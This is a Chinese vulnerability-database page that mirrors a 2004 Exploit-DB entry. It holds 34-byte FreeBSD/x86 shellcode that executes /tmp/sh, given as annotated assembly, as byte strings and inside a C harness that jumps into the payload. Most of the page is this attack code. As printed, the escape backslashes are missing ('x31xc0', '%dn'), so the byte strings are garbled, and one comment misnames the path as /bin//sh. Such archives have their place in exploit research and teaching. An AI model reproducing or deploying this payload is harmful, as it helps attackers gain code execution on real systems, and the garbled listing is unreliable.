FreeBSD/x86 – execve(/tmp/sh) Shellcode (34 bytes)-安全小百科

FreeBSD/x86 – execve(/tmp/sh) Shellcode (34 bytes)

漏洞ID	1054672	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	FreeBSD_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13277

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
 * FreeBSD shellcode - execve /tmp/sh
 * 
 * Claes M. Nyberg 20020120
 *
 * <[email protected]>, <[email protected]>
 */

/**********************************************************
void
main()
{
__asm__("
        xorl    %eax, %eax   # eax = 0
        pushl   %eax         # string ends with NULL
        pushl   $0x68732f2f  # push 'hs//' (//sh)
        pushl   $0x706d742f  # push 'pmt/' (/tmp)
        movl    %esp, %ebx   # ebx = argv[0] = string addr
        pushl   %eax         # argv[1] = NULL
        pushl   %ebx         # argv[0] = /bin//sh
        movl    %esp, %edx   # edx = &argv[0]
        
        pushl   %eax         # envp = NULL
        pushl   %edx         # &argv[0]
        pushl   %ebx         # *path = argv[0]
        pushl   %eax         # Dummy
        movb    $0x3b, %al   # al = 59 = execve
        int     $0x80        # execve(argv[0], argv, NULL)

        xorl    %eax, %eax   # eax = 0
        inc     %eax         # eax++
        pushl   %eax         # Exit value = 1
        pushl   %eax         # Dummy
        int     $0x80        # exit(1); (eax is 1 = execve)
    ");
}
************************************************************/

#include <stdio.h>
#include <string.h>

static char freebsd_code[] =
    "x31xc0"               /* xorl    %eax, %eax  */
    "x50"                   /* pushl   %eax        */
    "x68x2fx2fx73x68"   /* pushl   $0x68732f2f */
    "x68x2fx74x6dx70"   /* pushl   $0x706d742f */
    "x89xe3"               /* movl    %esp, %ebx  */
    "x50"                   /* pushl   %eax        */
    "x53"                   /* pushl   %ebx        */
    "x89xe2"               /* movl    %esp, %edx  */
    "x50"                   /* pushl   %eax        */     
    "x52"                   /* pushl   %edx        */    
    "x53"                   /* pushl   %ebx        */
    "x50"                   /* pushl   %eax        */
    "xb0x3b"               /* movb    $0x3b, %al  */
    "xcdx80"               /* int     $0x80       */
    "x31xc0"               /* xorl    %eax, %eax  */
    "x40"                   /* inc     %eax        */ 
    "x50"                   /* pushl   %eax        */
    "x50"                   /* pushl   %eax        */
    "xcdx80";              /* int     $0x80       */


static char _freebsd_code[] =
    "x31xc0x50x68x2fx2fx73x68"
    "x68x2fx74x6dx70x89xe3x50"
    "x53x89xe2x50x52x53x50xb0"
    "x3bxcdx80x31xc0x40x50x50"
    "xcdx80";

void
main(void)
{
	void (*code)() = (void *)freebsd_code;
	printf("strlen code: %dn", strlen(freebsd_code));
	code();
}

// milw0rm.com [2004-09-26]

相关推荐: Symantec Norton Personal Firewall 2002 Portscan Protection Bypass Vulnerability

Symantec Norton Personal Firewall 2002 Portscan Protection Bypass Vulnerability 漏洞ID 1102222 漏洞类型 Design Error 发布时间 2002-04-16 更新时…

文章版权归作者所有，未经允许请勿转载。

THE END